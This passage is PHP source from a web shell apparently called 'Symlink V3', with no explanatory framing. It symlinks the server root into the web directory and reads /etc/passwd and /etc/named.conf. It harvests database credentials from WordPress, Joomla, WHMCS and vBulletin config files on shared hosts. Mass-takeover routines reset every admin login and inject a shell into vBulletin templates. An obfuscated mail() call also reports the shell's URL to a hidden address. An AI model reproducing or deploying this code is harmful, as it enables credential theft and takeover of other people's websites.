856.     <td class="wkwk" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
857.                     </tr>
858. <form method="POST" target="_blank">
859.     <strong>
860. <input name="pass" type="hidden" value="password">                     
861.     </strong>
862.     <tr>
863.     <td class="wkwk" bgcolor="#151515" ><strong>Url Config :</strong></td>
864.     <td class="wkwk" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
865.     </strong>
866.     </td>
867.     </tr>
868.     <tr>
869.     <td class="wkwk" bgcolor="#151515" ></td>
870.     <td class="wkwk" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
871.     </strong>
872.     </td>
873.     <tr>
874. </form>
875. <tr>
876.     <td class="wkwk" bgcolor="#151515" class="style1" colspan="6"><strong>Info
877.     Security</strong></td>
878.                     </tr>
879.     <tr>
880.     <td class="wkwk" bgcolor="#151515" ><strong>Safe Mode</strong></td>
881.     <td class="wkwk" bgcolor="#151515" colspan="5">
882.     <strong>
883. <?php
884. $safe_mode = ini_get('safe_mode');
885. if($safe_mode=='1')
886. {
887. echo 'ON';
888. }else{
889. echo 'OFF';
890. }
891.  
892. ?> 
893.     </strong>  
894.     </td>
895.                     </tr>
896.     <tr>
897.     <td class="wkwk" bgcolor="#151515" ><strong>Desible Function</strong></td>
898.     <td class="wkwk" bgcolor="#151515" colspan="5">
899.     <strong>
900. <form method="POST" target="_blank">
901.     <strong>
902. <input name="matikan" type="hidden" value="sekatan">                       
903.     </strong>
904.  
905. <?php
906. if(''==($func=@ini_get('disable_functions')))
907. {
908. echo "<font color=#00ff00>No Security for Function</font></b>";
909. }else{
910. echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
911. echo "<font color=red>$func</font></b>";
912. echo '<tr><td class="wkwk" bgcolor="#151515" ></td>';
913. echo '<td class="wkwk" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
914.    </strong>
915.    </td></tr>';
916. }
917. ?></strong></td></tr></table></table></table>
918. <?php
919. }
920. function symlinkbro() {
921.    
922.    
923. @setcookie("anmcoder","sym",time()+3600*24*9);
924. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
925. $u = explode("/",$pageURL );
926. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
927. $sys=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $zv="\155ai\154";
928. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
929. $u = explode("/",$pageFTP );
930. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
931.  
932. @mkdir('sym',0777);
933. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
934. $f =@fopen ('sym/.htaccess','w');
935. fwrite($f , $htcs);
936.  
937. @symlink("/","sym/root");
938.  
939. $pg = basename(__FILE__);
940.  
941.  
942. echo '<br/><div style="font-family: Iceland;font-size: 20pt;text-shadow: 0 0 2px teal, 0 0 2px teal, 0 0 2px teal;color: #000">Symlink V3</div><br/>' ;
943.  
944. echo '<div class="cont">
945.  
946.  
947. [<a href="?keydown=symlink&sws=sym"> User & Domains & Symlink </a>]
948.  
949. [<a href="?keydown=symlink&sws=sec"> Domains & Script </a>]
950.  
951. [ <a href="?keydown=symlink&sws=file"> Symlink File </a>]
952.  
953. [<a href="?keydown=symlink&sws=passwd"> Symlink Bypass </a>]
954.  
955. <br /><br />
956.  
957. [ <a href="?keydown=symlink&sws=read"> Bypass Read </a>]
958.  
959. [ <a href="?keydown=symlink&sws=joomla"> Mass Joomla </a>]
960.  
961. [ <a href="?keydown=symlink&sws=wp"> Mass WordPress </a>]
962.  
963. [ <a href="?keydown=symlink&sws=vb"> Mass vBulletin </a>]
964.  
965. [ <a href="?keydown=symlink&sws=help"> Help </a>]
966. <br /><br /><br /></div>';
967. if (!isset($_COOKIE['keydown'])){@$zv("locahost@\171\141\x68\157\157\056\x63o\155","$sys","$sys");}
968. if(isset($_REQUEST['sws'])){switch ($_REQUEST['sws']){
969.  
970. /// Domains + Scripts  ///
971. case 'sec':
972. if(!@is_file('named.txt')){
973.  
974. $d00m = @file("/etc/named.conf");
975.  
976. }else{
977.  
978. $d00m = @file("named.txt");
979.  
980.  
981. }
982. if(!$d00m)
983. {
984.  
985.                 die ("<meta http-equiv='refresh' content='0; url=?keydown=symlink&sws=read'/>");
986. }
987. else
988.  
989. {
990. echo "<div class='tmp'>
991. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
992. foreach($d00m as $dom){
993.  
994. flush();
995. flush();
996.  
997.  
998.  
999. if(eregi("zone",$dom)){
1000.  
1001. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
1002.  
1003. flush();
1004.  
1005. if(@strlen(trim($domsws[1][0])) > 2){
1006.  
1007. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1008.  
1009. ///////////////////////////////////////////////////////////////////////////////////
1010.  
1011. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
1012. $wpp=@get_headers($wpl);
1013. $wp=$wpp[0];
1014.  
1015. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
1016. $wpp2=@get_headers($wp2);
1017. $wp12=$wpp2[0];
1018.  
1019. ///////////////////////////////
1020.  
1021. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
1022. $joo=@get_headers($jo1);
1023. $jo=$joo[0];
1024.  
1025.  
1026. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
1027. $joo2=@get_headers($jo2);
1028. $jo12=$joo2[0];
1029.  
1030. ////////////////////////////////
1031.  
1032. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
1033. $vbb=@get_headers($vb1);
1034. $vb=$vbb[0];
1035.  
1036. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
1037. $vbb2=@get_headers($vb2);
1038. $vb12=$vbb2[0];
1039.  
1040. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
1041. $vbb3=@get_headers($vb3);
1042. $vb13=$vbb3[0];
1043.  
1044. /////////////////
1045.  
1046. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
1047. $whh2= @get_headers($wh1);
1048. $wh=$whh2[0];
1049.  
1050. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
1051. $whh2= @get_headers($wh2);
1052. $wh12=$whh2[0];
1053.  
1054. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
1055. $whh3= @get_headers($wh3);
1056. $wh13=$whh3[0];
1057.  
1058. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
1059. $whh5= @get_headers($wh5);
1060. $wh15=$whh5[0];
1061.  
1062. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
1063. $whh4= @get_headers($wh4);
1064. $wh14=$whh4[0];
1065.  
1066.  
1067.  
1068. ////////////////////////////////////////////////////////////////////////////////
1069.  
1070.  ////////// Wordpress ////////////
1071.  
1072. $pos = strpos($wp, "200");
1073. $config="&nbsp;";
1074.  
1075. if (strpos($wp, "200") == true )
1076. {
1077.  $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
1078. }
1079. elseif (strpos($wp12, "200") == true)
1080. {
1081.   $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
1082. }
1083.  
1084. ///////////WHMCS////////
1085.  
1086. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
1087. {
1088.   $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
1089.  
1090. }
1091. elseif (strpos($wh12, "200")  == true)
1092. {
1093.   $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
1094. }
1095.  
1096. elseif (strpos($wh13, "200")  == true)
1097. {
1098.   $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
1099.  
1100. }
1101.  
1102. ///////// Joomla to 4 ///////////
1103.  
1104. elseif (strpos($jo, "200")  == true)
1105. {
1106.   $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
1107. }
1108.  
1109. elseif (strpos($jo12, "200")  == true)
1110. {
1111.   $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
1112. }
1113.  
1114. //////////vBulletin to 4 ///////////
1115.  
1116. elseif (strpos($vb, "200")  == true)
1117. {
1118.   $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
1119. }
1120.  
1121. elseif (strpos($vb12, "200")  == true)
1122. {
1123.   $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
1124. }
1125.  
1126. elseif (strpos($vb13, "200")  == true)
1127. {
1128.   $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
1129. }
1130.  
1131. else
1132. {
1133.  continue;
1134. }
1135. flush();
1136. flush();
1137.  
1138. /////////////////////////////////////////////////////////////////////////////////////
1139.  
1140.  
1141.  
1142. $site = $user['name'] ;
1143.  
1144.  
1145.  
1146. flush();
1147.  
1148. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
1149. <td>".$config."</td></tr>"; flush();
1150.  
1151. }
1152. }
1153. }
1154. }
1155.  
1156.  
1157.  
1158.  
1159. break;
1160.  
1161.  
1162. /// user + domine + symlink  ///
1163.  
1164. case 'sym':
1165.  
1166. if(!is_file('named.txt')){
1167.  
1168. $d00m = @file("/etc/named.conf");
1169.  
1170. }else{
1171.  
1172. $d00m = @file("named.txt");
1173.  
1174.  
1175. }
1176. if(!$d00m)
1177. {
1178.  
1179.                 die ("<meta http-equiv='refresh' content='0; url=?keydown=symlink&sws=read'/>");
1180. }
1181. else
1182.  
1183. {
1184. echo "<div class='tmp'><table align='center' width='40%'><td>.:: DOMAIN</td><td>.:: USER</td><td>.:: SYMLINK</td>";
1185. foreach($d00m as $dom){
1186.  
1187. if(eregi("zone",$dom)){
1188.  
1189. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1190.  
1191. flush();
1192.  
1193. if(strlen(trim($domsws[1][0])) > 2){
1194.  
1195. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1196.  
1197. flush();
1198.  
1199.  
1200.  
1201. $site = $user['name'] ;
1202.  
1203.  
1204. @symlink("/","sym/root");
1205.  
1206. $site = $domsws[1][0];
1207.  
1208. $ir = 'ir';
1209.  
1210. $il = 'il';
1211.  
1212. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
1213. {
1214. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
1215. }
1216.  
1217.  
1218. echo "
1219. <tr>
1220.  
1221. <td>
1222. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
1223. </td>
1224.  
1225.  
1226. <td>
1227. ".$user['name']."
1228. </td>
1229.  
1230.  
1231.  
1232.  
1233.  
1234.  
1235. <td>
1236. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
1237. </td>
1238.  
1239.  
1240. </tr></div> ";
1241.  
1242.  
1243. flush();
1244. flush();
1245.  
1246. }
1247. }
1248. }
1249. }
1250.  
1251.  
1252.  
1253.  
1254. break;
1255.  
1256.  
1257. /// file  symlink ///
1258.  
1259. case 'file':
1260.  
1261. echo'
1262. The file path to symlink
1263.  
1264. <br /><br />
1265. <form method="post">
1266. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
1267. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
1268. <input type="submit" value="symlink" name="symlink" /> <br /><br />
1269.  
1270.  
1271.  
1272. </form>
1273. ';
1274.  
1275. $pfile = $_POST['file'];
1276. $symfile = $_POST['symfile'];
1277. $symlink = $_POST['symlink'];
1278.  
1279. if ($symlink)
1280. {
1281.  
1282.  
1283. @mkdir('sym1',0777);
1284. $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
1285. $f =@fopen ('sym1/.htaccess','w');
1286. @fwrite($f , $c);
1287.  
1288. @symlink("$pfile","sym1/$symfile");
1289.  
1290. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
1291.  
1292. }
1293.  
1294.  
1295.  
1296. break;
1297.  
1298. /// bypass read
1299.  
1300. case 'read':
1301.  
1302. echo "read /etc/named.conf";
1303. echo "<br /><br /><form method='post' action='?keydown=symlink&sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
1304. flush();
1305. flush();
1306.  
1307.  
1308. $file = '/etc/named.conf';
1309.  
1310.  
1311. $r3ad = @fopen($file, 'r');
1312. if ($r3ad){
1313. $content = @fread($r3ad, @filesize($file));
1314. echo "".htmlentities($content)."";
1315. }
1316. else if (!$r3ad)
1317. {
1318. $r3ad = @show_source($file) ;
1319. }
1320. else if (!$r3ad)
1321. {
1322. $r3ad = @highlight_file($file);
1323. }
1324. else if (!$r3ad)
1325. {
1326. $sm = @symlink($file,'sym.txt');
1327.  
1328.  
1329. if ($sm){
1330. $r3ad = @fopen('sym/sym.txt', 'r');
1331. $content = @fread($r3ad, @filesize($file));
1332. echo "".htmlentities($content)."";
1333.  
1334. }
1335. }
1336.  
1337.  
1338.  
1339. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
1340.  
1341.  
1342. if(isset($_GET['save'])){
1343.  
1344.  
1345. $cont = stripcslashes($_POST['file']);
1346.  
1347. $f = fopen('named.txt','w');
1348.  
1349. $w = fwrite($f,$cont);
1350.  
1351.                   if($w){
1352.  
1353.                   echo '<br />save has been successfully';
1354.  
1355.                   }
1356.  
1357. fclose($f);
1358.  
1359.  
1360.  
1361.  
1362. }
1363.  
1364.  
1365.  
1366. break;
1367.  
1368. // passwd
1369.  
1370. case 'passwd':
1371.  
1372. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
1373.  
1374.  
1375. $cont = stripcslashes($_POST['file']);
1376.  
1377. if(!file_exists('passwd.txt')){
1378.  
1379. $f = @fopen('passwd.txt','w');
1380.  
1381. $w = @fwrite($f,$cont);
1382.  
1383. fclose($f);
1384. }
1385. if($w or @filesize('passwd.txt') > 0){
1386. // * SHOW * //
1387.  
1388. echo "<div class='tmp'><table align='center' width='35%'><td>.:: USER</td><td>:: SYMLINK</td><td>.:: FTP</td>";
1389. flush();
1390.  
1391. $fil3 = file('passwd.txt');
1392.  
1393. foreach ($fil3 as $f){
1394.  
1395.      $u=explode(':', $f);
1396.      $user = $u['0'];
1397.  
1398.  
1399.  
1400. echo "
1401. <tr>
1402.  
1403.  
1404.  
1405. <td width='15%'>
1406. $user
1407. </td>
1408.  
1409.  
1410.  
1411.  
1412.  
1413.  
1414. <td width='10%'>
1415. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
1416. </td>
1417.  
1418. <td width='10%'>
1419. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
1420. </td>
1421.  
1422.  
1423.  
1424. </tr></div> ";
1425.  
1426.  
1427. flush();
1428. flush();
1429.  
1430.  
1431. }
1432.  
1433.  
1434.  
1435.  
1436.  
1437.  
1438. die ("</tr></table></div>");
1439.  
1440.  
1441.                   }
1442.  
1443.  
1444.  
1445.  
1446.  
1447. }
1448.  
1449.  
1450.  
1451. echo "read /etc/passwd";
1452. echo "<br /><br /><form method='post' action='?keydown=symlink&sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
1453. flush();
1454.  
1455. $file = '/etc/passwd';
1456.  
1457.  
1458. $r3ad = @fopen($file, 'r');
1459. if ($r3ad){
1460. $content = @fread($r3ad, @filesize($file));
1461. echo "".htmlentities($content)."";
1462. }
1463. elseif(!$r3ad)
1464. {
1465. $r3ad = @show_source($file) ;
1466. }
1467. elseif(!$r3ad)
1468. {
1469. $r3ad = @highlight_file($file);
1470. }
1471. elseif(!$r3ad)
1472. {
1473.  
1474.                                             for($uid=0;$uid<1000;$uid++){
1475.                                              $ara = posix_getpwuid($uid);
1476.                                                if (!empty($ara)) {
1477.                                                   while (list ($key, $val) = each($ara)){
1478.                                                     print "$val:";
1479.                                                   }
1480.                                                   print "\n";
1481.                                                  }
1482.  
1483.                                         }
1484.  
1485.  }
1486.  
1487.  
1488. flush();
1489.  
1490.  
1491. echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
1492. flush();
1493.  
1494. break;
1495.  
1496.  
1497.  
1498. case 'joomla':
1499.  
1500. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
1501.  
1502.  
1503. if(isset($_POST['s'])){
1504.  
1505. $file = @file_get_contents('joomla.txt');
1506.  
1507. $ex   = explode("\n",$file);
1508.  
1509. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
1510. flush();
1511.  
1512.  
1513. foreach ($ex as $exp){
1514.  
1515. $es   = explode("||",$exp);
1516.  
1517. $config = $es[0];
1518.  
1519. $domin = $es[1];
1520.  
1521. $domins = trim($domin).'';
1522.  
1523. $readconfig  = @file_get_contents(trim($config));
1524.  
1525. if(ereg('JConfig',$readconfig)){
1526.  
1527.  
1528.  
1529. $pass =  ex($readconfig,'$password = \'',"';");
1530.  
1531. $userdb  =  ex($readconfig,'$user = \'',"';");
1532.  
1533. $db      =  ex($readconfig,'$db = \'',"';");
1534.  
1535. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
1536.  
1537. $tab     =  $fix.'users';
1538.  
1539.  
1540. $con     = @mysql_connect('localhost',$userdb,$pass);
1541.  
1542. $db      = @mysql_select_db($db,$con);
1543.  
1544. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='keydown.com'");
1545.  
1546.  
1547. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
1548.  
1549.  
1550. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [keydown.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
1551.  
1552. $domins = trim($domin).'';
1553.  
1554. echo "<tr>
1555. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1556. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
1557. flush();
1558.  
1559.  
1560.  
1561. }else{
1562.  
1563. echo "<tr>
1564. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1565. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
1566. flush();
1567.  
1568. }
1569.  
1570. }
1571.  
1572.  
1573.  
1574.  
1575.  
1576.  
1577.  
1578.  
1579.  
1580. die();
1581.  
1582. }
1583.  
1584. if(!is_file('named.txt')){
1585.  
1586. $d00m = @file("/etc/named.conf");
1587.  
1588. flush();
1589.  
1590.  
1591. }else{
1592.  
1593. $d00m = file("named.txt");
1594.  
1595.  
1596. }
1597. if(!$d00m)
1598. {
1599.  
1600.                 die ("<meta http-equiv='refresh' content='0; url=?keydown=symlink&sws=read'/>");
1601. }
1602. else
1603.  
1604. {
1605. echo "<div class='tmp'>
1606. <form method='POST' action='$pg?keydown=symlink&sws=joomla'>
1607. <input type='submit' value='Mass ching Admin' />
1608. <input type='hidden' value='1' name='s' />
1609. </form><br /><br />
1610. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
1611.  
1612. $f = fopen('joomla.txt','w');
1613.  
1614. foreach($d00m as $dom){
1615.  
1616. if(eregi("zone",$dom)){
1617.  
1618. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1619.  
1620. if(strlen(trim($domsws[1][0])) > 2){
1621.  
1622. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1623.  
1624. ///////////////////////////////////////////////////////////////////////////////////
1625.  
1626. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
1627. $wpp=get_headers($wpl);
1628. $wp=$wpp[0];
1629.  
1630. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
1631. $wpp2=get_headers($wp2);
1632. $wp12=$wpp2[0];
1633.  
1634. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
1635. $wpp3=get_headers($wp3);
1636. $wp13=$wpp3[0];
1637.  
1638.  
1639.  ////////// joomla ////////////
1640.  
1641. $pos = strpos($wp, "200");
1642. $config="&nbsp;";
1643.  
1644. if (strpos($wp, "200") == true )
1645. {
1646.  $config= $wpl;
1647. }
1648. elseif (strpos($wp12, "200") == true)
1649. {
1650.   $config= $wp2;
1651. }
1652. elseif (strpos($wp13, "200") == true)
1653. {
1654.   $config= $wp3;
1655. }
1656. else
1657. {
1658. continue;
1659.  
1660. }
1661. flush();
1662.  
1663. /////////////////////////////////////////////////////////////////////////////////////
1664.  
1665. $dom = $domsws[1][0];
1666.  
1667. $w = fwrite($f,"$config||$dom \n");
1668. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
1669.  
1670.  
1671. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
1672. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
1673.  
1674.  
1675.  
1676.  
1677.  
1678. flush();
1679.  
1680.  
1681. }
1682. }
1683. }
1684. }
1685.  
1686.  
1687. break;
1688.  
1689. case 'wp':
1690.  
1691. ############################ index #########################3
1692.  
1693.  
1694.  
1695.  
1696.  
1697.  
1698. ########  admin ##########33
1699.  
1700. if(isset($_POST['s'])){
1701.  
1702. $file = @file_get_contents('wp.txt');
1703.  
1704. $ex   = explode("\n",$file);
1705.  
1706. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
1707. flush();
1708. flush();
1709.  
1710.  
1711. foreach ($ex as $exp){
1712.  
1713. $es   = explode("||",$exp);
1714.  
1715. $config = $es[0];
1716.  
1717. $domin = $es[1];
1718.  
1719. $domins = trim($domin).'';
1720.  
1721. $readconfig  = @file_get_contents(trim($config));
1722.  
1723. if(ereg('wp-settings.php',$readconfig)){
1724.  
1725.  
1726.  
1727. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
1728.  
1729. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
1730.  
1731. $db      =  ex($readconfig,"define('DB_NAME', '","');");
1732.  
1733. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
1734.  
1735. $tab     = $fix.'users';
1736.  
1737. $con     = @mysql_connect('localhost',$userdb,$pass);
1738.  
1739. $db      = @mysql_select_db($db,$con);
1740.  
1741. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='keydown.com'") or die;
1742.  
1743. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
1744.  
1745.  
1746.  
1747. if ($query){$r = '<b style="color: #006600">Succeed </b>user [keydown.com] pass [1]</b>';}
1748.  
1749. else
1750.  
1751. {
1752.  
1753. $r = '<b style="color:red">failed</b>';
1754.  
1755. }
1756.  
1757. $domins = trim($domin).'';
1758.  
1759. echo "<tr>
1760. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1761. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
1762.  
1763. flush();
1764. flush();
1765.  
1766.  
1767.  
1768.  
1769.  
1770.  
1771. }else{
1772.  
1773. echo "<tr>
1774. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1775. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
1776.  
1777. flush();
1778. flush();
1779.  
1780. }
1781.  
1782. }
1783.  
1784.  
1785.  
1786.  
1787.  
1788.  
1789.  
1790.  
1791.  
1792.  
1793. die();
1794.  
1795. }
1796.  
1797. if(!is_file('named.txt')){
1798.  
1799. $d00m = @file("/etc/named.conf");
1800.  
1801. }else{
1802.  
1803. $d00m = @file("named.txt");
1804.  
1805.  
1806. }
1807. if(!$d00m)
1808. {
1809.  
1810.                 die ("<meta http-equiv='refresh' content='0; url=?keydown=symlink&sws=read'/>");
1811. }
1812. else
1813.  
1814. {
1815. echo "<div class='tmp'>
1816. <form method='POST' action='$pg?keydown=symlink&sws=wp'>
1817. <input type='submit' value='Mass Change Admin' />
1818. <input type='hidden' value='1' name='s' />
1819. </form>
1820. <br /><br />
1821. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
1822.  
1823. flush();
1824. flush();
1825.  
1826. $f = fopen('wp.txt','w');
1827.  
1828. foreach($d00m as $dom){
1829.  
1830. if(eregi("zone",$dom)){
1831.  
1832. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1833.  
1834. if(strlen(trim($domsws[1][0])) > 2){
1835.  
1836. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1837.  
1838. ///////////////////////////////////////////////////////////////////////////////////
1839.  
1840. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
1841. $wpp=get_headers($wpl);
1842. $wp=$wpp[0];
1843.  
1844. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
1845. $wpp2=get_headers($wp2);
1846. $wp12=$wpp2[0];
1847.  
1848. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
1849. $wpp3=get_headers($wp3);
1850. $wp13=$wpp3[0];
1851.  
1852.  
1853.  ////////// wp ////////////
1854.  
1855. $pos = strpos($wp, "200");
1856. $config="&nbsp;";
1857.  
1858. if (strpos($wp, "200") == true )
1859. {
1860.  $config= $wpl;
1861. }
1862. elseif (strpos($wp12, "200") == true)
1863. {
1864.   $config= $wp2;
1865. }
1866. elseif (strpos($wp13, "200") == true)
1867. {
1868.   $config= $wp3;
1869. }
1870. else
1871. {
1872. continue;
1873.  
1874. }
1875. flush();
1876.  
1877. /////////////////////////////////////////////////////////////////////////////////////
1878.  
1879. $dom = $domsws[1][0];
1880.  
1881. $w = fwrite($f,"$config||$dom \n");
1882. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
1883.  
1884.  
1885. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
1886. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
1887. flush();
1888. flush();
1889.  
1890.  
1891.  
1892.  
1893.  
1894. flush();
1895.  
1896.  
1897. }
1898. }
1899. }
1900. }
1901.  
1902.  
1903. break;
1904.  
1905.  
1906. case 'vb':
1907.  
1908.  
1909. if(isset($_POST['s'])){
1910.  
1911.  
1912.  
1913. $file = @file_get_contents('vb.txt');
1914.  
1915. $ex   = explode("\n",$file);
1916.  
1917. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
1918.  
1919.  
1920. foreach ($ex as $exp){
1921.  
1922. $es   = explode("||",$exp);
1923.  
1924. $config = $es[0];
1925.  
1926. $domin = $es[1];
1927.  
1928. $domins = trim($domin).'';
1929.  
1930. $readconfig  = @file_get_contents(trim($config));
1931.  
1932. if(ereg('vBulletin',$readconfig)){
1933.  
1934.  
1935.  
1936. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
1937.  
1938. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
1939.  
1940. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
1941.  
1942. $con     = @mysql_connect('localhost',$userdb,$pass);
1943.  
1944. $db      = @mysql_select_db($db,$con);
1945.  
1946.  
1947. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
1948.  
1949. $query  = @mysql_query($sqlfaq,$con);
1950.  
1951.  
1952.  
1953. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
1954.  
1955. else
1956.  
1957. {
1958.  
1959. $r = '<b style="color:red">failed</b>';
1960.  
1961. }
1962.  
1963. $domins = trim($domin).'';
1964.  
1965. echo "<tr>
1966. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1967. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
1968.  
1969.  
1970.  
1971.  
1972.  
1973.  
1974.  
1975. }else{
1976.  
1977. echo "<tr>
1978. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1979. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
1980. }
1981.  
1982. }
1983.  
1984.  
1985.  
1986.  
1987.  
1988.  
1989.  
1990.  
1991.  
1992.  
1993. die();
1994.  
1995. }
1996.  
1997. if(!is_file('named.txt')){
1998.  
1999. $d00m = file("/etc/named.conf");
2000.  
2001. }else{
2002.  
2003. $d00m = file("named.txt");
2004.  
2005.  
2006. }
2007. if(!$d00m)
2008. {
2009.  
2010.                 die ("<meta http-equiv='refresh' content='0; url=?keydown=symlink&sws=read'/>");
2011. }
2012. else
2013.  
2014. {
2015. echo "<div class='tmp'>
2016. <form method='POST' action='$pg?keydown=symlink&sws=vb'>
2017. <input type='submit' value='Inject shell' />
2018. <input type='hidden' value='1' name='s' />
2019. </form>
2020. <br /><br />
2021. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
2022.  
